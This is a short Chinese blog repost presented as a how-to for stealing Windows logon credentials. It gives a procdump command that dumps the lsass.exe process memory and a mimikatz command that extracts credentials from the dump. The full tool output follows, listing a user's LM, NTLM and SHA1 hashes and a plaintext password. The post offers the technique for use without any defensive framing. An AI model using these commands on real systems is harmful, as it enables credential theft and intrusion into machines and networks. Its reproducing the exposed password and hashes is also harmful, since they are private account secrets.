ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

procdump64+mimikatz获取win用户hash密码

2019-03-11 20:49:05  阅读:583  来源: 互联网

标签:Username Domain chenglee hash procdump64 win PC null Logon


1.导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2.执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

 

 

 

效果:

  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
 
mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'
 
mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...
 
Authentication Id : 0 ; 137859 (00000000:00021a83)
Session           : Interactive from 1
User Name         : chenglee
Domain            : chenglee-PC
Logon Server      : CHENGLEE-PC
Logon Time        : 2018/7/25 15:06:35
SID               : S-1-5-21-452281122-3045282507-3243563612-1000
    msv :  
     [00000003] Primary
     * Username : chenglee
     * Domain   : chenglee-PC
     * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
     * NTLM     : 8d0f8e1a18236379538411a9056799f5
     * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
    tspkg :
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    wdigest :  
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    kerberos : 
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    ssp :  
    credman :  
 
Authentication Id : 0 ; 137821 (00000000:00021a5d)
Session           : Interactive from 1
User Name         : chenglee
Domain            : chenglee-PC
Logon Server      : CHENGLEE-PC
Logon Time        : 2018/7/25 15:06:35
SID               : S-1-5-21-452281122-3045282507-3243563612-1000
    msv :  
     [00000003] Primary
     * Username : chenglee
     * Domain   : chenglee-PC
     * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
     * NTLM     : 8d0f8e1a18236379538411a9056799f5
     * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
    tspkg :
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    wdigest :  
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    kerberos : 
     * Username : chenglee
     * Domain   : chenglee-PC
     * Password : lizhenghua
    ssp :  
    credman :  
 
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:15
SID               : S-1-5-19
    msv :  
    tspkg :
    wdigest :  
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos : 
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :  
    credman :  
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CHENGLEE-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:15
SID               : S-1-5-20
    msv :  
    tspkg :
    wdigest :  
     * Username : CHENGLEE-PC$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos : 
     * Username : chenglee-pc$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :  
    credman :  
 
Authentication Id : 0 ; 48630 (00000000:0000bdf6)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:06
SID               :
    msv :  
    tspkg :
    wdigest :  
    kerberos : 
    ssp :  
    credman :  
 
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CHENGLEE-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:05
SID               : S-1-5-18
    msv :  
    tspkg :
    wdigest :  
     * Username : CHENGLEE-PC$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos : 
     * Username : chenglee-pc$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :  
    credman :  
 
mimikatz(commandline) # exit
Bye!

 

标签:Username,Domain,chenglee,hash,procdump64,win,PC,null,Logon
来源: https://www.cnblogs.com/-qing-/p/10513011.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有